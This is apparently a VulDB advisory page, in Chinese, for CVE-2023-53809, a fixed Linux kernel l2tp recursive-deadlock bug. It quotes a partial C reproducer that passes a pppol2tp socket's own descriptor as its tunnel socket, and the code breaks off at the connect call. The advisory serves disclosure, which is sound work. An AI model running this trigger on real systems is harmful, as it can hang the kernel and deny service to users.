CVE-2023-53809 in Linux
摘要
由 VulDB • 2026-06-05
在 Linux 内核中,已修复以下漏洞:
l2tp: 避免 l2tp_tunnel_register() 中可能出现的递归死锁
当将 pppol2tp 套接字的文件描述符作为 UDP 套接字的文件描述符传递时,会在 l2tp_tunnel_register() 中出现递归死锁。可以通过以下程序重现此情况:
```c int main(void) {
int sock; struct sockaddr_pppol2tp addr;
sock = socket(AF_PPPOX, SOCK_DGRAM, PX_PROTO_OL2TP); if (sock < 0) {
perror("socket"); return 1; }
addr.sa_family = AF_PPPOX; addr.sa_protocol = PX_PROTO_OL2TP; addr.pppol2tp.pid = 0; addr.pppol2tp.fd = sock; addr.pppol2tp.addr.sin_family = PF_INET; addr.pppol2tp.addr.sin_port = htons(0); addr.pppol2tp.addr.sin_addr.s_addr = inet_addr("192.168.0.1"); addr.pppol2tp.s_tunnel = 1; addr.pppol2tp.s_session = 0; addr.pppol2tp.d_tunnel = 0; addr.pppol2tp.d_session = 0;
if (connect(sock, (const struct sockaddr *)&addr, sizeof(addr)) < 0) {
Statistical analysis made it clear that VulDB provides the best quality for vulnerability data.